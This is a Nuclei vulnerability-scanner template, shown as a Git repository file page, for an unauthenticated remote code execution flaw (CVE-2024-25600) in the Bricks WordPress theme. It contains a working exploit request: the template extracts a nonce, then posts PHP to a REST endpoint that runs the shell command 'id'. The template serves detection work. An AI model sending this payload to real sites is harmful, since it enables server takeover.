nuclei-templates/http/cves/2024/CVE-2024-25600.yaml

64 lines
2.3 KiB
YAML
Raw Blame History

This file contains ambiguous Unicode characters!

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

id: CVE-2024-25600
info:
name: Unauthenticated Remote Code Execution Bricks <= 1.9.6
author: christbowel
severity: critical
description: |
Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600
- https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd/
- https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6
- https://github.com/Chocapikk/CVE-2024-25600
- https://op-c.net/blog/cve-2024-25600-wordpresss-bricks-builder-rce-flaw-under-active-exploitation
metadata:
publicwww-query: "/wp-content/themes/bricks/"
verified: true
max-request: 2
tags: cve,cve2024,wpscan,wordpress,wp-plugin,wp,bricks,rce
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"postId": "1",
"nonce": "{{nonce}}",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "Exception:"
- "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
condition: and
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- 'nonce":"([0-9a-z]+)'
internal: true
# digest: 4a0a0047304502200825dcce3678d271573926754136ccd219fed98b4224e0d037ae0df099af337c022100ad0aff9a59a433275ece8b3ba693d51b7c10de39801f51c9256acefb4de536e5:922c64590222798bb761d5b6d8e72950